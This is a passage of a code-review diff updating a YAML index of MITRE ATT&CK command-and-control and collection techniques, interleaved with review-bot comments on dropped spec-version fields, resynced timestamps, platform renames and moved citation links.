@@ -38778,7 +39268,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -38804,8 +39294,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
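Review bot: removing both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1132.002 leaves that object with no spec-version marker at all, whereas neighbouring objects in this file keep `x_mitre_attack_spec_version: 3.1.0` or `3.2.0` and lose only `spec_version`. The same happens to T1001.002, T1008, T1102.001, T1560.003, T1114.001 and T1560.002 further down. If the new source bundle simply omits the field for these objects the data is not wrong, but any consumer that reads `x_mitre_attack_spec_version` now has to treat it as optional; if the generator or a downstream script assumes the key is present, this is the hunk where that assumption breaks. Please confirm the omission is intentional upstream rather than a partial export.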
@@ -38872,7 +39360,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
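Review bot: pre-existing rather than introduced by this patch, but visible in this hunk's context: T1071.001 carries an `identifier: T1071.001` key beside `atomic_tests: []`, while T1001.003, T1090.004 and T1132 above end with `atomic_tests: []` and no `identifier` at all. The key duplicates the mapping key it sits under and is evidently emitted for only some techniques; either emit it for every technique or drop it, otherwise consumers must special-case its absence. Fine as a follow-up if the generator is out of scope for this PR.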
@@ -38970,7 +39457,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -39063,7 +39549,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -39087,7 +39572,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -39110,8 +39595,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -39136,7 +39619,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -39156,8 +39639,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -39211,7 +39692,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -39236,7 +39716,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -39262,8 +39742,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -39317,7 +39795,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -39393,7 +39870,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -39450,7 +39926,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -39544,7 +40019,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -39623,7 +40097,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -39662,7 +40135,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39677,30 +40150,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39709,13 +40162,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -39729,20 +40186,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39785,7 +40259,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -39810,7 +40283,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39830,22 +40303,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39862,11 +40337,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
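Review bot: the platform list for T1114 replaces `- Office 365` and `- Google Workspace` with a single `- Office Suite` entry, and the same substitution appears for T1213.002 and T1530 in this file, with T1119 gaining `- Office Suite` as well. If per-platform index files are derived from `x_mitre_platforms` by matching the platform string, every technique previously bucketed under Office 365 or Google Workspace now lands in an Office Suite bucket and the old buckets silently lose those rows. Please confirm the generator's platform-to-index mapping was updated in the same change, or document that the Office 365 and Google Workspace indexes are superseded, so a missing row is not mistaken for a removed technique.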
@@ -39882,37 +40356,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -39924,75 +40389,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
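Review bot: the Prevailion DarkWatchman citation URL changes from the live prevailion.com page to a web.archive.org snapshot (20220629), and the Mandiant M-Trends 2020 citation a few hunks below moves from content.fireeye.com to a mandiant.com PDF. Both come from the upstream bundle, so nothing to change in the generated file, but if a link checker runs over these YAML files it should be configured to accept archive.org URLs, and the T1025 change in this same hunk is only a `modified` update plus `x_mitre_attack_spec_version` 2.1.0 to 3.2.0 with `x_mitre_version` unchanged at '1.2', which confirms this is a bundle re-stamp rather than a technique revision.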
@@ -40019,7 +40502,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40043,13 +40526,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -40070,6 +40551,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -40093,8 +40575,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -40119,7 +40603,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -40186,12 +40669,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -40225,10 +40707,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -40239,13 +40723,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -40286,37 +40771,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40327,23 +40786,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
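Review bot: the `modified` timestamp for T1005 goes backwards here, from '2023-05-09T14:00:00.188Z' to '2023-04-12T23:54:39.466Z', and the same happens to several other objects further down (T1560.002, T1602.002, T1125, T1557.001, T1557.002). The old values all share the odd `14:00:00.188Z` time component, which suggests they were batch-stamped rather than copied from upstream, so this is most likely a resync to the authoritative STIX timestamps; the PR description should name the ATT&CK bundle version the index was regenerated from so reviewers can check that. The `spec_version: '2.1'` lines dropped in this hunk (and in almost every hunk below) are a schema change for anything that parses this file; grep the index-generation scripts for `spec_version` before merging.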
@@ -40413,7 +40896,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
@@ -40448,7 +40930,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
